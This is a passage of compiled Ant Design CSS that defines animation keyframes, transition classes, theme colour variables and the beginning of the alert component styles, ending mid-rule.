.ant-move-right-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-move-right-leave { -webkit-animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); animation-timing-function: cubic-bezier(0.6, 0.04, 0.98, 0.34); } @-webkit-keyframes antMoveDownIn { 0% { transform: translateY(100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } } @keyframes antMoveDownIn { 0% { transform: translateY(100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } } @-webkit-keyframes antMoveDownOut { 0% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateY(100%); transform-origin: 0 0; opacity: 0; } } @keyframes antMoveDownOut { 0% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateY(100%); transform-origin: 0 0; opacity: 0; } } @-webkit-keyframes antMoveLeftIn { 0% { transform: translateX(-100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } } @keyframes antMoveLeftIn { 0% { transform: translateX(-100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } } @-webkit-keyframes antMoveLeftOut { 0% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateX(-100%); transform-origin: 0 0; opacity: 0; } } @keyframes antMoveLeftOut { 0% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateX(-100%); transform-origin: 0 0; opacity: 0; } } @-webkit-keyframes antMoveRightIn { 0% { transform: translateX(100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } } @keyframes antMoveRightIn { 0% { transform: translateX(100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } } @-webkit-keyframes antMoveRightOut { 0% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateX(100%); transform-origin: 0 0; opacity: 0; } } @keyframes antMoveRightOut { 0% { transform: translateX(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateX(100%); transform-origin: 0 0; opacity: 0; } } @-webkit-keyframes antMoveUpIn { 0% { transform: translateY(-100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } } @keyframes antMoveUpIn { 0% { transform: translateY(-100%); transform-origin: 0 0; opacity: 0; } 100% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } } @-webkit-keyframes antMoveUpOut { 0% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateY(-100%); transform-origin: 0 0; opacity: 0; } } @keyframes antMoveUpOut { 0% { transform: translateY(0%); transform-origin: 0 0; opacity: 1; } 100% { transform: translateY(-100%); transform-origin: 0 0; opacity: 0; } } @-webkit-keyframes loadingCircle { 100% { transform: rotate(360deg); } } @keyframes loadingCircle { 100% { transform: rotate(360deg); } } [ant-click-animating='true'], [ant-click-animating-without-extra-node='true'] { position: relative; } html { --antd-wave-shadow-color: var(--ant-primary-color); --scroll-bar: 0; } [ant-click-animating-without-extra-node='true']::after, .ant-click-animating-node { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; border-radius: inherit; box-shadow: 0 0 0 0 var(--ant-primary-color); box-shadow: 0 0 0 0 var(--antd-wave-shadow-color); opacity: 0.2; -webkit-animation: fadeEffect 2s cubic-bezier(0.08, 0.82, 0.17, 1), waveEffect 0.4s cubic-bezier(0.08, 0.82, 0.17, 1); animation: fadeEffect 2s cubic-bezier(0.08, 0.82, 0.17, 1), waveEffect 0.4s cubic-bezier(0.08, 0.82, 0.17, 1); -webkit-animation-fill-mode: forwards; animation-fill-mode: forwards; content: ''; pointer-events: none; } @-webkit-keyframes waveEffect { 100% { box-shadow: 0 0 0 var(--ant-primary-color); box-shadow: 0 0 0 6px var(--antd-wave-shadow-color); } } @keyframes waveEffect { 100% { box-shadow: 0 0 0 var(--ant-primary-color); box-shadow: 0 0 0 6px var(--antd-wave-shadow-color); } } @-webkit-keyframes fadeEffect { 100% { opacity: 0; } } @keyframes fadeEffect { 100% { opacity: 0; } } .ant-slide-up-enter, .ant-slide-up-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-up-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-up-enter.ant-slide-up-enter-active, .ant-slide-up-appear.ant-slide-up-appear-active { -webkit-animation-name: antSlideUpIn; animation-name: antSlideUpIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-slide-up-leave.ant-slide-up-leave-active { -webkit-animation-name: antSlideUpOut; animation-name: antSlideUpOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-slide-up-enter, .ant-slide-up-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); } .ant-slide-up-leave { -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); } .ant-slide-down-enter, .ant-slide-down-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-down-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-down-enter.ant-slide-down-enter-active, .ant-slide-down-appear.ant-slide-down-appear-active { -webkit-animation-name: antSlideDownIn; animation-name: antSlideDownIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-slide-down-leave.ant-slide-down-leave-active { -webkit-animation-name: antSlideDownOut; animation-name: antSlideDownOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-slide-down-enter, .ant-slide-down-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); } .ant-slide-down-leave { -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); } .ant-slide-left-enter, .ant-slide-left-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-left-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-left-enter.ant-slide-left-enter-active, .ant-slide-left-appear.ant-slide-left-appear-active { -webkit-animation-name: antSlideLeftIn; animation-name: antSlideLeftIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-slide-left-leave.ant-slide-left-leave-active { -webkit-animation-name: antSlideLeftOut; animation-name: antSlideLeftOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-slide-left-enter, .ant-slide-left-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); } .ant-slide-left-leave { -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); } .ant-slide-right-enter, .ant-slide-right-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-right-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-slide-right-enter.ant-slide-right-enter-active, .ant-slide-right-appear.ant-slide-right-appear-active { -webkit-animation-name: antSlideRightIn; animation-name: antSlideRightIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-slide-right-leave.ant-slide-right-leave-active { -webkit-animation-name: antSlideRightOut; animation-name: antSlideRightOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-slide-right-enter, .ant-slide-right-appear { opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); } .ant-slide-right-leave { -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); } @-webkit-keyframes antSlideUpIn { 0% { transform: scaleY(0.8); transform-origin: 0% 0%; opacity: 0; } 100% { transform: scaleY(1); transform-origin: 0% 0%; opacity: 1; } } @keyframes antSlideUpIn { 0% { transform: scaleY(0.8); transform-origin: 0% 0%; opacity: 0; } 100% { transform: scaleY(1); transform-origin: 0% 0%; opacity: 1; } } @-webkit-keyframes antSlideUpOut { 0% { transform: scaleY(1); transform-origin: 0% 0%; opacity: 1; } 100% { transform: scaleY(0.8); transform-origin: 0% 0%; opacity: 0; } } @keyframes antSlideUpOut { 0% { transform: scaleY(1); transform-origin: 0% 0%; opacity: 1; } 100% { transform: scaleY(0.8); transform-origin: 0% 0%; opacity: 0; } } @-webkit-keyframes antSlideDownIn { 0% { transform: scaleY(0.8); transform-origin: 100% 100%; opacity: 0; } 100% { transform: scaleY(1); transform-origin: 100% 100%; opacity: 1; } } @keyframes antSlideDownIn { 0% { transform: scaleY(0.8); transform-origin: 100% 100%; opacity: 0; } 100% { transform: scaleY(1); transform-origin: 100% 100%; opacity: 1; } } @-webkit-keyframes antSlideDownOut { 0% { transform: scaleY(1); transform-origin: 100% 100%; opacity: 1; } 100% { transform: scaleY(0.8); transform-origin: 100% 100%; opacity: 0; } } @keyframes antSlideDownOut { 0% { transform: scaleY(1); transform-origin: 100% 100%; opacity: 1; } 100% { transform: scaleY(0.8); transform-origin: 100% 100%; opacity: 0; } } @-webkit-keyframes antSlideLeftIn { 0% { transform: scaleX(0.8); transform-origin: 0% 0%; opacity: 0; } 100% { transform: scaleX(1); transform-origin: 0% 0%; opacity: 1; } } @keyframes antSlideLeftIn { 0% { transform: scaleX(0.8); transform-origin: 0% 0%; opacity: 0; } 100% { transform: scaleX(1); transform-origin: 0% 0%; opacity: 1; } } @-webkit-keyframes antSlideLeftOut { 0% { transform: scaleX(1); transform-origin: 0% 0%; opacity: 1; } 100% { transform: scaleX(0.8); transform-origin: 0% 0%; opacity: 0; } } @keyframes antSlideLeftOut { 0% { transform: scaleX(1); transform-origin: 0% 0%; opacity: 1; } 100% { transform: scaleX(0.8); transform-origin: 0% 0%; opacity: 0; } } @-webkit-keyframes antSlideRightIn { 0% { transform: scaleX(0.8); transform-origin: 100% 0%; opacity: 0; } 100% { transform: scaleX(1); transform-origin: 100% 0%; opacity: 1; } } @keyframes antSlideRightIn { 0% { transform: scaleX(0.8); transform-origin: 100% 0%; opacity: 0; } 100% { transform: scaleX(1); transform-origin: 100% 0%; opacity: 1; } } @-webkit-keyframes antSlideRightOut { 0% { transform: scaleX(1); transform-origin: 100% 0%; opacity: 1; } 100% { transform: scaleX(0.8); transform-origin: 100% 0%; opacity: 0; } } @keyframes antSlideRightOut { 0% { transform: scaleX(1); transform-origin: 100% 0%; opacity: 1; } 100% { transform: scaleX(0.8); transform-origin: 100% 0%; opacity: 0; } } .ant-zoom-enter, .ant-zoom-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-enter.ant-zoom-enter-active, .ant-zoom-appear.ant-zoom-appear-active { -webkit-animation-name: antZoomIn; animation-name: antZoomIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-zoom-leave.ant-zoom-leave-active { -webkit-animation-name: antZoomOut; animation-name: antZoomOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-zoom-enter, .ant-zoom-appear { transform: scale(0); opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-zoom-enter-prepare, .ant-zoom-appear-prepare { transform: none; } .ant-zoom-leave { -webkit-animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-zoom-big-enter, .ant-zoom-big-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-big-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-big-enter.ant-zoom-big-enter-active, .ant-zoom-big-appear.ant-zoom-big-appear-active { -webkit-animation-name: antZoomBigIn; animation-name: antZoomBigIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-zoom-big-leave.ant-zoom-big-leave-active { -webkit-animation-name: antZoomBigOut; animation-name: antZoomBigOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-zoom-big-enter, .ant-zoom-big-appear { transform: scale(0); opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-zoom-big-enter-prepare, .ant-zoom-big-appear-prepare { transform: none; } .ant-zoom-big-leave { -webkit-animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-zoom-big-fast-enter, .ant-zoom-big-fast-appear { -webkit-animation-duration: 0.1s; animation-duration: 0.1s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-big-fast-leave { -webkit-animation-duration: 0.1s; animation-duration: 0.1s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-big-fast-enter.ant-zoom-big-fast-enter-active, .ant-zoom-big-fast-appear.ant-zoom-big-fast-appear-active { -webkit-animation-name: antZoomBigIn; animation-name: antZoomBigIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-zoom-big-fast-leave.ant-zoom-big-fast-leave-active { -webkit-animation-name: antZoomBigOut; animation-name: antZoomBigOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-zoom-big-fast-enter, .ant-zoom-big-fast-appear { transform: scale(0); opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-zoom-big-fast-enter-prepare, .ant-zoom-big-fast-appear-prepare { transform: none; } .ant-zoom-big-fast-leave { -webkit-animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-zoom-up-enter, .ant-zoom-up-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-up-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-up-enter.ant-zoom-up-enter-active, .ant-zoom-up-appear.ant-zoom-up-appear-active { -webkit-animation-name: antZoomUpIn; animation-name: antZoomUpIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-zoom-up-leave.ant-zoom-up-leave-active { -webkit-animation-name: antZoomUpOut; animation-name: antZoomUpOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-zoom-up-enter, .ant-zoom-up-appear { transform: scale(0); opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-zoom-up-enter-prepare, .ant-zoom-up-appear-prepare { transform: none; } .ant-zoom-up-leave { -webkit-animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-zoom-down-enter, .ant-zoom-down-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-down-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-down-enter.ant-zoom-down-enter-active, .ant-zoom-down-appear.ant-zoom-down-appear-active { -webkit-animation-name: antZoomDownIn; animation-name: antZoomDownIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-zoom-down-leave.ant-zoom-down-leave-active { -webkit-animation-name: antZoomDownOut; animation-name: antZoomDownOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-zoom-down-enter, .ant-zoom-down-appear { transform: scale(0); opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-zoom-down-enter-prepare, .ant-zoom-down-appear-prepare { transform: none; } .ant-zoom-down-leave { -webkit-animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-zoom-left-enter, .ant-zoom-left-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-left-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-left-enter.ant-zoom-left-enter-active, .ant-zoom-left-appear.ant-zoom-left-appear-active { -webkit-animation-name: antZoomLeftIn; animation-name: antZoomLeftIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-zoom-left-leave.ant-zoom-left-leave-active { -webkit-animation-name: antZoomLeftOut; animation-name: antZoomLeftOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-zoom-left-enter, .ant-zoom-left-appear { transform: scale(0); opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-zoom-left-enter-prepare, .ant-zoom-left-appear-prepare { transform: none; } .ant-zoom-left-leave { -webkit-animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-zoom-right-enter, .ant-zoom-right-appear { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-right-leave { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-play-state: paused; animation-play-state: paused; } .ant-zoom-right-enter.ant-zoom-right-enter-active, .ant-zoom-right-appear.ant-zoom-right-appear-active { -webkit-animation-name: antZoomRightIn; animation-name: antZoomRightIn; -webkit-animation-play-state: running; animation-play-state: running; } .ant-zoom-right-leave.ant-zoom-right-leave-active { -webkit-animation-name: antZoomRightOut; animation-name: antZoomRightOut; -webkit-animation-play-state: running; animation-play-state: running; pointer-events: none; } .ant-zoom-right-enter, .ant-zoom-right-appear { transform: scale(0); opacity: 0; -webkit-animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); animation-timing-function: cubic-bezier(0.08, 0.82, 0.17, 1); } .ant-zoom-right-enter-prepare, .ant-zoom-right-appear-prepare { transform: none; } .ant-zoom-right-leave { -webkit-animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); animation-timing-function: cubic-bezier(0.78, 0.14, 0.15, 0.86); } @-webkit-keyframes antZoomIn { 0% { transform: scale(0.2); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @keyframes antZoomIn { 0% { transform: scale(0.2); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @-webkit-keyframes antZoomOut { 0% { transform: scale(1); } 100% { transform: scale(0.2); opacity: 0; } } @keyframes antZoomOut { 0% { transform: scale(1); } 100% { transform: scale(0.2); opacity: 0; } } @-webkit-keyframes antZoomBigIn { 0% { transform: scale(0.8); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @keyframes antZoomBigIn { 0% { transform: scale(0.8); opacity: 0; } 100% { transform: scale(1); opacity: 1; } } @-webkit-keyframes antZoomBigOut { 0% { transform: scale(1); } 100% { transform: scale(0.8); opacity: 0; } } @keyframes antZoomBigOut { 0% { transform: scale(1); } 100% { transform: scale(0.8); opacity: 0; } } @-webkit-keyframes antZoomUpIn { 0% { transform: scale(0.8); transform-origin: 50% 0%; opacity: 0; } 100% { transform: scale(1); transform-origin: 50% 0%; } } @keyframes antZoomUpIn { 0% { transform: scale(0.8); transform-origin: 50% 0%; opacity: 0; } 100% { transform: scale(1); transform-origin: 50% 0%; } } @-webkit-keyframes antZoomUpOut { 0% { transform: scale(1); transform-origin: 50% 0%; } 100% { transform: scale(0.8); transform-origin: 50% 0%; opacity: 0; } } @keyframes antZoomUpOut { 0% { transform: scale(1); transform-origin: 50% 0%; } 100% { transform: scale(0.8); transform-origin: 50% 0%; opacity: 0; } } @-webkit-keyframes antZoomLeftIn { 0% { transform: scale(0.8); transform-origin: 0% 50%; opacity: 0; } 100% { transform: scale(1); transform-origin: 0% 50%; } } @keyframes antZoomLeftIn { 0% { transform: scale(0.8); transform-origin: 0% 50%; opacity: 0; } 100% { transform: scale(1); transform-origin: 0% 50%; } } @-webkit-keyframes antZoomLeftOut { 0% { transform: scale(1); transform-origin: 0% 50%; } 100% { transform: scale(0.8); transform-origin: 0% 50%; opacity: 0; } } @keyframes antZoomLeftOut { 0% { transform: scale(1); transform-origin: 0% 50%; } 100% { transform: scale(0.8); transform-origin: 0% 50%; opacity: 0; } } @-webkit-keyframes antZoomRightIn { 0% { transform: scale(0.8); transform-origin: 100% 50%; opacity: 0; } 100% { transform: scale(1); transform-origin: 100% 50%; } } @keyframes antZoomRightIn { 0% { transform: scale(0.8); transform-origin: 100% 50%; opacity: 0; } 100% { transform: scale(1); transform-origin: 100% 50%; } } @-webkit-keyframes antZoomRightOut { 0% { transform: scale(1); transform-origin: 100% 50%; } 100% { transform: scale(0.8); transform-origin: 100% 50%; opacity: 0; } } @keyframes antZoomRightOut { 0% { transform: scale(1); transform-origin: 100% 50%; } 100% { transform: scale(0.8); transform-origin: 100% 50%; opacity: 0; } } @-webkit-keyframes antZoomDownIn { 0% { transform: scale(0.8); transform-origin: 50% 100%; opacity: 0; } 100% { transform: scale(1); transform-origin: 50% 100%; } } @keyframes antZoomDownIn { 0% { transform: scale(0.8); transform-origin: 50% 100%; opacity: 0; } 100% { transform: scale(1); transform-origin: 50% 100%; } } @-webkit-keyframes antZoomDownOut { 0% { transform: scale(1); transform-origin: 50% 100%; } 100% { transform: scale(0.8); transform-origin: 50% 100%; opacity: 0; } } @keyframes antZoomDownOut { 0% { transform: scale(1); transform-origin: 50% 100%; } 100% { transform: scale(0.8); transform-origin: 50% 100%; opacity: 0; } } .ant-motion-collapse-legacy { overflow: hidden; } .ant-motion-collapse-legacy-active { transition: height 0.2s cubic-bezier(0.645, 0.045, 0.355, 1), opacity 0.2s cubic-bezier(0.645, 0.045, 0.355, 1) !important; } .ant-motion-collapse { overflow: hidden; transition: height 0.2s cubic-bezier(0.645, 0.045, 0.355, 1), opacity 0.2s cubic-bezier(0.645, 0.045, 0.355, 1) !important; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-affix { position: fixed; z-index: 10; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-alert { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: flex; align-items: center; padding: 8px 15px; word-wrap: break-word; border-radius: 2px; } .ant-alert-content { flex: 1; min-width: 0; } .ant-alert-icon { margin-right: 8px; } .ant-alert-description { display: none; font-size: 14px; line-height: 22px; } .ant-alert-success { background-color: var(--ant-success-color-deprecated-bg); border: 1px solid var(--ant-success-color-deprecated-border); } .ant-alert-success .ant-alert-icon { color: var(--ant-success-color); } .ant-alert-info { background-color: var(--ant-info-color-deprecated-bg); border: 1px solid var(--ant-info-color-deprecated-border); } .ant-alert-info .ant-alert-icon { color: var(--ant-info-color); } .ant-alert-warning { background-color: var(--ant-warning-color-deprecated-bg); border: 1px solid var(--ant-warning-color-deprecated-border); } .ant-alert-warning .ant-alert-icon { color: var(--ant-warning-color); } .ant-alert-error { background-color: var(--ant-error-color-deprecated-bg); border: 1px solid var(--ant-error-color-deprecated-border); } .ant-alert-error .ant-alert-icon { color: var(--ant-error-color); } .ant-alert-error .ant-alert-description > pre { margin: 0; padding: 0; } .ant-alert-action { margin-left: 8px; } .ant-alert-close-icon { 